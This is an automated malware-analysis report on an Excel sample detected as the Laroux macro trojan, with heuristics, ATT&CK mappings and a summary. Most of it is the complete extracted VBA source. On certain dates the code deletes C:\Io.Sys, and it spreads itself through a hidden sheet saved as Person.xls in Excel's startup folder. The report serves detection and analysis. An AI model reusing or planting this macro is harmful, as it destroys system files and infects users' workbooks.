MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical heuristic firing indicates ClamAV detection of 'Xls.Trojan.Laroux-23', strongly suggesting a known malicious Excel macro trojan. The presence of an Auto_Open VBA macro confirms the intent to execute malicious code upon opening the document. The script attempts to delete 'C:\Io.Sys' and save a copy of the workbook as 'Person.xls' in the startup path, likely to establish persistence or facilitate further payload execution.
Heuristics 2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2379 bytes |
SHA-256: 4e67c6d9739989a24f69db4a6e532aba962a52d121d9e6e3a106e02a03e79182 |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-23
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "aola"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If Day(Date) >= 4 And Day(Date) <= 13 And Time < #2:25:00 PM# Then
SetAttr "C:\Io.Sys", vbNormal
Kill "C:\Io.Sys"
End If
Application.OnSheetActivate = "AutoCopy"
End Sub
Sub AutoCopy()
Attribute AutoCopy.VB_ProcData.VB_Invoke_Func = " \n14"
Dim sStPath, sFile, swName, swnew, sCurDir As String
Dim bPtoF, bFtoP As Boolean
bPtoF = False
bFtoP = False
On Error Resume Next
sStPath = Application.StartupPath
sFile = Dir(sStPath & "\" & "Person.xls")
bFtoP = sFile <> "Person.xls"
bPtoF = Not (bFtoP And (ActiveWorkbook.Modules.Count > 0))
If bFtoP Then
Application.ScreenUpdating = False
swName = ActiveWorkbook.Name
Sheets("aola").Visible = True
Sheets("aola").Select
Sheets("aola").Copy
swnew = ActiveWorkbook.Name
sCurDir = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(swnew).SaveAs FileName:=Application.StartupPath & "/" & "Person.xls", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir sCurDir
Workbooks(swName).Sheets("aola").Visible = False
ActiveWindow.ActivateNext
End If
If bPtoF And (Not bFtoP) Then
swnew = ActiveWorkbook.Name
Application.ScreenUpdating = False
sCurDir = ActiveWorkbook.Path
If Workbooks(swnew).Sheets(1).Name <> "aola" Then
Workbooks("Person.xls").Sheets("aola").Copy before:=Workbooks(swnew).Sheets(1)
Workbooks(swnew).Sheets("aola").Visible = False
Workbooks(swnew).Save
End If
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "Person.xls!AutoCopy"
End Sub
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.